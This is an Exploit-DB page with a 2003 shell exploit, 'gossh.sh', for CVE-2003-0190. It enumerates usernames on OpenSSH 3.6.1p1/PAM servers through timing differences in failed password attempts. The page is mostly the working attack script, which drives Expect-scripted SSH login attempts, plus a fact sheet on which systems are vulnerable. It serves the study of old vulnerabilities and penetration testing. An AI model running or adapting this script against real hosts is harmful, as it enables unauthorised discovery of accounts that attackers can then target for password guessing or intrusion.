OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident

EDB-ID:

26

CVE:

2003-0190

EDB Verified:

Author:

Nicolas Couture

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

2003-05-02

Vulnerable App: 
#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@stormvault.net
#
# Description:
#	-Tells you wether or not a user exist on
#	  a distant server running OpenSSH.
# 
# Usage:
#	-You NEED to have the host's public key
#	  before executing this script. 
#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Fact Sheet:					 #
#	  o It is really accurate against	 #
#	    redhat boxes.			 #
# 	  o Linux boxes running grsecurity	 #
#	    has 10 seconds delay on both	 #
#	    valid AND invalid user login	 #
#	    attempts.				 #
#	  o *BSD boxes are not vulnerables and	 #
#	     always has 10 seconds delay like  	 #
#	     Linux-Grsec + network protection    #
#						 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:				 
#	 Thu May  1 15:41:18 EDT 2003  
#	  ; Script started.		
#	 Thu May  1 16:42:30 EDT 2003	
#	  ; Script is functional.	             
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
 echo "$0 <user> <host>"
 exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions         #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
expasswd() {
cat << EOF > expasswd 
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing      #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect script.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing    #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result    #
#=-=-=-=-=#

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
 echo "This box is not vulnerable."
 exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
 echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
 echo "$USER doesn't exist on $HOST."
else
 echo "Segmentation fault."
 exit 13
fi

# Remove tmp files.
rm -rf expasswd experror

# EOF

# milw0rm.com [2003-05-02]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services